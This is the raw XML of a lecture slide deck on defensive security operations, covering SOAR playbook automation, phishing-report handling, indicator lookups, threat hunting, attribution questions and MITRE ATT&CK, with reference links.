              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Valites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Crafting the InfoSec Playbook: Security Monitoring and Incident Response Master Plan, O'Reilly, 2015.  ISBN: 978-1491949405</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BE9EB0D-A25E-AB40-B5ED-FCFFC30AA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650" y="2298700"/>
            <a:ext cx="3352800" cy="4432300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2208391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7CC6-63D7-A143-A548-71BA5217A167}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automating Playbooks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19B4DEFF-DB3C-F34E-8EB8-84DEDC9A2E6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>If you do the same thing every time can you automate that?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>This is not putting people out of jobs this is “automating the boring stuff” so you can focus on the important stuff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>SOAR - Security Orchestration Automation &amp; Response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Splunk SOAR (formerly Phantom)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Palo Alto SOAR (formerly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Demisto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342381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F4E9-4EFD-8442-90D1-49078E002273}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spam/Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{596A25AB-9BC8-3044-8993-E612D4840ADD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>User reports spam/phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Tool pulls raw email + headers from the user’s mailbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Review the message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If it was sent by an internal user/IP – block it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Playbook for this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If it was external, report it to the external source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If it matches current user awareness phishing campaign notify user a congratulatory message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Add message to a “phish bowl” so people can see what’s already been reported</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Ex: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>it.brown.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/alerts/phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295505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34712-F307-CA4B-AC31-B50515CA9238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IOC indicator - Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71BBD2D9-8843-0746-9E6B-E969D5EFD187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Query threat intel vendor sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Virustotal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Censys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>, others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>DNS lookup</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>GeoIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> location information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Registration information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>If looks suspicious – block?  Yes/No</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Even this can be automated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409292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9A6D-10A2-1C4A-AD13-43B5AC2F7079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4583760F-138C-B84D-BC01-3A4D7379C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077200" cy="6842575"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4233230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EA1D-E375-0A49-80BD-CFC7C29781A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat Hunting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99D011FB-18EE-0C4B-A5FC-EF1B4666D949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>IR work is typically reactionary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>What if we are proactive and try to find evil on our network when it is just a compromise and not a breach?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Or is this just a “cooler” rebranding of Incident Response?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="359802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Playbooks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>A shift in incident response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>A collection of “plays” that generate actionable reports from a set of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>A “play” is a fully documented procedure for finding undesired activity </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Goal: Automate as much as possible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2412420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EB36-8085-A440-941E-46BEE56B73BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Threat Hunting Investigation Types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0C61FC-4123-3549-8C9F-55411114F543}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Looking for known Indicators of Compromise (IOCs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Utilize your catalog of know </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>IoCs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> to search against in your logs to find ongoing attack/compromise activity in your environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Analytics/machine learning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Use all the fancy/$ buzzwords to review log data and find irregularities/patterns to review.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Hypothesis-driven investigations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Discover new tactics, techniques, procedures (TTPs) via research/shared intel and investigate on your own network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="491595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D7BF-D239-684F-85DA-299CD17AFCE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intel / Attribution </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A42E708-0438-3344-A4AE-4B104EE86BEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>What can you learn about the attacker?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>What tools do they use?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>What’s their C&amp;C infrastructure?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Who are their targets?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>What is their motivation?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1731046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614E-220A-7345-B763-48049E9D6A2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2340863"/>
            <a:ext cx="3755136" cy="649065"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C352F8CE-93D4-FA44-9D8B-01E895B510FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3755136" y="314468"/>
            <a:ext cx="5388864" cy="6229064"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6D8037D-4F89-394A-B4D2-3B7AB65C184A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3515938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CD7F-3780-AB47-BCDC-067C7BCC4959}"/>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6B31C746-A3D5-0845-A108-A6196A9C78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893" y="0"/>
            <a:ext cx="7649307" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="476948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EBDE-CECC-9D48-9F49-73997DAA047E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional Info</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F4D03D-E47D-DC4B-B2DF-D4B8969BE169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional references/links for more on threat intelligence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/hslatman/awesome-threat-intelligence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/A3sal0n/CyberThreatHunting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415362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CC0F-BFAA-9E47-9339-4036896E9918}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MITRE ATT&amp;CK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38EC6C9C-2774-F044-AAFC-FC7A38353729}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Tactics, techniques, sub-techniques, and procedures </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>14 tactics that encompass different sets of techniques. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Each tactic represents a tactical goal – a specific behavior that a threat actor is using in their attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Typically used post-compromised to detect an adversary operating inside an enterprise.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="807405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A911-1A36-5767-3663-6E7B3609F789}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
